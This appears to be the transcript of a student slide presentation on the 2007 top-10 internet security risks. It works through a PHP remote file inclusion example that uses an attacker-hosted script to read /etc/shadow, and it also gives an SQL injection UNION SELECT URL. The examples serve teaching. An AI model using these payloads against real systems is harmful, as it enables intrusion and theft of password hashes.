internet security
DESCRIPTION
Presentation in english for first year at the institute of technology of Saint-Malo : Top-10 2007 Security RisksTRANSCRIPT
Yohann Lepage – Vincent Palierne
Top-10 2007 Security Risks
Wednesday 6th May 2008
INTERNET SECURITY
Summary
Client-side Vulnerabilities
ServerClient
Network(Internet)
Vulnerabilities
Softwares
Web Browsers
Email Clients
Media Players
Clients-Side Vulnerabilities
Server-Side Vulnerabilities
ServerClient
Network(Internet)
Vulnerabilities
Web Applications
Hacker www.mysite.com/index.php
<?php
include($page.'.php');
?>
Index.php
<?php passthru("cat /etc/shadow"); ?>
cat.php
www.badguy.ru/cat.php
$>wget www.mysite.com/index.php?page=www.haxor.com/cat Network
(Internet)
USER:PASSWORDroot:S5AçéZl~]Linus:@ée)&#$*^%Httpd:Jpzi5z@°
Www.mysite.com/indexindex.php
Vulnerabilities
Database Software
http://localhost/admin.php?module=news&id= -1 union select 0,1,database(),3,4,5,6,7 from membres--
Security Policy and Personal
Phishing/Spear Phishing
Application Abuse
Instant Messaging
I MI M
Peer-to-Peer Programs
Zero Day Attacks
Conclusion
Internet security is hard because :
End